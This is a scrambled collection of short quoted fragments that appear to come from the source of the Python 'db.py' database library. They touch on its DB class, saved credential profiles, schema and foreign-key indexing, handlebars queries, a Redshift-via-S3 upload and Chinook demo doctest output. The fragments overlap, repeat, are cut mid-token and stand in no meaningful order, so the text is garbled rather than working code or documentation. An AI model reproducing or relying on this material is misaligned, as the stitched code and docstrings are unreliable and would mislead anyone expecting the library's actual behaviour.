Upload speed is *much* faster if chunks = multiple-of-slices.", "if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your", "EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) | | Genre", "to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3", "using keys, you can use an S3 object print_sql: bool (False) option for", "| | Track | MediaTypeId | INTEGER | | Track | GenreId |", "... COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP BY", "all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table", "\"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId", "DW1.XL nodes have 2 slices per node, so if running 2 nodes you", "| Track | TrackId | INTEGER | | Track | AlbumId | INTEGER", "keys to display in the foreign and reference keys. This is used to", "self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname", "def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach to", "0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname,", "arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con", "S3 object print_sql: bool (False) option for printing sql statement that will be", "None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password =", "<NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME>", "}} ... {{else}} ... {{ . }} , ... {{/if}} ... 
{{/cols}} ...", "keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar,", "7 For Those About To Rock We Salute You 8 For Those About", "specify which data type(s) you want to return Examples ---------- >>> from db", "data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and are NVARCHAR(70)S or", "NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice | InvoiceId", "for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\"", "AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the", "generate schema from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name)", "hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>,", "\"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name |", "port for db. 
portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433", "DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\")", "self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the table", "INTEGER | | Employee | ReportsTo | INTEGER | | Employee | EmployeeId", "if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): #", "if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname", ";\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\]", "raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import S3Connection from", "Customer | Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER |", "be no limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int,", "{\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data)", "profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def", "os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try:", "None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname':", "from a file. 
Parameters ---------- filename: str A SQL script data: list, dict", "either function argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)", "\"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\":", "def find_table(self, search): \"\"\" Aggresively search through your database's schema for a table.", "pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need to convert it to", "foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table,", "Your username for the database password: str Your password for the database hostname:", "'%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp", "Genre | Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) |", "self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc", "Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with", "to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def", "4 Restless and Wild 3 2 4 5 Princess of the Dawn 3", "probably don't need this, but if you're a db admin you might actually", "DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\"", "col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql,", "to execute data: list, dict Optional argument for handlebars-queries. 
Data will be passed", "bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket", "INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns", "{u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username':", "No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite',", "database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict", "COPY from S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex:", "Restless and Wild 5 For Those About To Rock We Salute You 6", "db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username, \"password\":", "Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that", "= 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif", "else: db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\":", "sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc as", "InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER |", "load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column,", "sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql)", "return db_dict def list_profiles(): \"\"\" Lists all of the database profiles available Examples", "= 
mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not", "... FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]}", "<NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5", "s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i):", "1 7 8 Inject The Venom 1 1 8 9 Snowballed 1 1", "configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't have", "file into pieces. according to amazon, this is # much faster when it", "profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"):", "INTEGER | | Customer | CustomerId | INTEGER | | Employee | EmployeeId", "your database from a file. Parameters ---------- filename: str A SQL script data:", "import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\"", "\"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(),", "available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list)", "self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q)", "db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0", "from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt", "# see 
http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks", "7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\"", "your database's schema for a table. Parameters ----------- search: str glob pattern for", "= profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your", "option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific", "= self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self,", "to default. # we can't do this in the function definition because we're", "f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def", "Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{ name }}'", "script data: list, dict Optional argument for handlebars-queries. Data will be passed to", "2 4 5 Princess of the Dawn 3 2 5 6 Put The", "name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a", "(optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db import DB import", "| INTEGER | | Track | TrackId | INTEGER | | Track |", "False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile", "import re import os import sys from collections import defaultdict import pandas as", "port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None", "order to operate). This includes things like schema definitions. Most of you probably", "how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type']))", "3 Restless and Wild 4 Restless and Wild 5 For Those About To", "multiple-of-slices. 
Ex: DW1.XL nodes have 2 slices per node, so if running 2", "\\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx,", "| INTEGER | | Album | ArtistId | INTEGER | | Artist |", "means that you'll have verrrrrrrry wide columns in some cases. driver: str, None", "re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert", "self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\"))", "Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>,", "u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}}", "+--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId", "For Those About To Rock (We Salute You) 0.99 1 Balls to the", "for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q =", "like to drop the table if it already exists chunk_size: int (10000) Number", "InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER |", "on. defaults to default port for db. portgres: 5432 redshift: 5439 mysql: 3306", "elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur", "+---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table | Column", "issue where rows are not in the same order, making doctest fail. 
db.find_column(\"Name\")", "redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't", "pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from", "use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name =", "len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>>", "sort in some way for all those doctests to be viable... -= if", "return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any", "= True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except", "column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name", "format. need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") #", "except Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e))", "schema definitions. Most of you probably don't need this, but if you're a", "arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self,", "_assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\",", "For Those About To Rock (We Salute You) 1 1 1 2 Balls", "etc AWS_ACCESS_KEY: str your aws access key. if this is None, the function", "your aws access key. if this is None, the function will try and", "or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. 
Please ensure it", "u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles =", "as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc", "Name AlbumId MediaTypeId \\ 0 1 For Those About To Rock (We Salute", "f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname')", "it by adding limit={X} to the `query` method, or by passing an argument", "dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\"", "frame. limit: int Number of records to return Examples -------- >>> from db", "match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'],", "Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER |", "\"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\")", "sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data'", "| Genre | GenreId | INTEGER | | Invoice | InvoiceId | INTEGER", "<NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1", "is a prefix, so it'll pick up # all of the data*.gz files", "[\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select *", "You 8 For Those About To Rock We Salute You 9 For Those", "in which to create the temporary transfer s3 bucket. This should match your", "\"\"\"Save the database credentials, plus the database properties to your db.py profile.\"\"\" if", "faster when it comes time to run the \\COPY statment. 
# # see", "is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password", "and attach to each table to the table name in dict for (table_schema,", "= [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def", "u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\")", "| +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer | SupportRepId", "self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys =", "if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it", "database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds =", "which to create the temporary transfer s3 bucket. This should match your redshift", "| INTEGER | | Customer | SupportRepId | INTEGER | | Customer |", "in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile)", "= [] table_meta = {} # pull out column metadata for all tables", "mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q", "... FROM ... {{ name }} ... GROUP BY ... table_name ... 
'''", "u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb',", "prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials,", "Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562", "normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else:", "then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite", "MySQLdb or pymysql library. Please ensure it is installed\") creds = {} for", "Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\",", "is used by the DB.query method. You can override it by adding limit={X}", "results = db.find_table(\"*\") # returns everything \"\"\" tables = [] for table in", "db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table |", "cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache:", "return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema", "Inject The Venom 1 1 8 9 Snowballed 1 1 9 10 Evil", "load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column,", "342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 
230619 3 1", "'{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's", "password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False):", "| Customer | Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70)", "q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)):", "len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About To Rock We", "tables containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables =", "so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a", "identifier/name for your database (i.e. \"dw\", \"prod\") from db import DB import pymysql", "and Wild 3 Restless and Wild 4 Restless and Wild 5 For Those", "named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ |", "= creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise", "t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables", "= \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql", "| Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type", "PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack", "but if you're a db admin you might actually want to query the", "credentials / profile for how you like your queries exclude_system_tables: bool Whether 
or", "... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False))", "table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second", "is # much faster when it comes time to run the \\COPY statment.", "Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name, f)) os.remove(f) except", "AWS location in which to create the temporary transfer s3 bucket. This should", "Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t,", "if this is None, the function will try and grab AWS_ACCESS_KEY from your", "definition because we're # lazily importing boto only if necessary here. if bucket_location", "Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1", "the relevant database libraries # TODO: maybe add warnings? try: import psycopg2 as", "schema from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name) #", "Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/", "self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name',", "None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None},", "{k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format", "verrrrrrrry wide columns in some cases. 
driver: str, None Driver for mssql/pyodbc connections.", "| NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer |", "tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for", "return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\"", "argument to `DB()`. None indicates that there will be no limit (That's right,", "GROUP BY ... table_name ... ''' >>> data = [ ... {\"name\": \"Album\"},", "for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT", "f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in", "self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not", "creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self,", "except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True", "refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks for any", "table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col", "library. Please ensure it is installed\") creds = {} for arg in [\"username\",", "4 5 Princess of the Dawn 3 2 5 6 Put The Finger", "file. Parameters ---------- filename: str A SQL script data: list, dict Optional argument", "stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e.", "HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. 
Please ensure it is installed\") self.con =", "self.password = password self.hostname = hostname self.port = port self.filename = filename self.dbname", "Restless and Wild 4 Restless and Wild 5 For Those About To Rock", "want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this is", "q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q,", "find pyodbc or pymssql libraries. Please ensure one of them is installed\") if", "True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC =", "| | Track | TrackId | INTEGER | | Track | AlbumId |", "or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify", "returns all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ |", "0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99", "... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... '''", "[] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx", "if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\":", "HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True", "it already exists chunk_size: int (10000) Number of DataFrame chunks to upload and", "None: pass else: raise Exception(\"Database type not specified! Must select one of: postgres,", "\"localhost\", \"10.20.1.248\") port: int Port the database is running on. 
defaults to default", "dbname: str Name of the database schemas: list List of schemas to include.", "sensitive data, but it will probably stop your little sister from stealing your", "= [data_type] cols = [] for table in self.tables: for col in vars(table):", "port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas", "0.99 5 Put The Finger On You 0.99 6 Let's Get It Up", "chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8'))", "data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if", "to the Wall 2 2 3 Restless and Wild 2 3 4 Let", "Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try:", "1 Artist 275 2 Track 3503 >>> q = ''' ... SELECT ...", "\\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql):", "dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db =", "{1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove profile {0}!", "from your environment variables s3: S3 alternative to using keys, you can use", "int, None Default number of keys to display in the foreign and reference", "4 Restless and Wild 5 For Those About To Rock We Salute You", "= creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname =", "= profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password =", "metadata for the DB.\"\"\" if len(self._tables) == 0: 
self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def", "8 Inject The Venom 1 1 8 9 Snowballed 1 1 9 10", "cnt ... FROM ... {{ name }} ... GROUP BY ... table_name ...", "s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID +", "t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t", "PrettyTable a bit. None means that you'll have verrrrrrrry wide columns in some", "to sqlite database dbname: str Name of the database schemas: list List of", "1 For Those About To Rock We Salute You 1 1 2 Balls", "dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>,", "value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg =", "... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER", "elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value", "key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation", "`AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets", "limit={X} to the `query` method, or by passing an argument to `DB()`. 
None", "time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None),", "| INTEGER | | Customer | CustomerId | INTEGER | | Employee |", "ColumnSet from .table import Table, TableSet from .s3 import S3 from .utils import", "limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your", "table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except", "table to the table name in dict for (table_schema, table_name, column_name, data_type) in", "Those About To Rock We Salute You 6 For Those About To Rock", "len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk", "fit into our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema.", "= [template(item) for item in data] query = [str(item) for item in query]", "AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as", "or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format(", "the template and rendered using handlebars. union: bool Whether or not \"UNION ALL\"", "self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port,", "0 1 For Those About To Rock (We Salute You) 1 1 1", "if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata.", "to using SQLite format. 
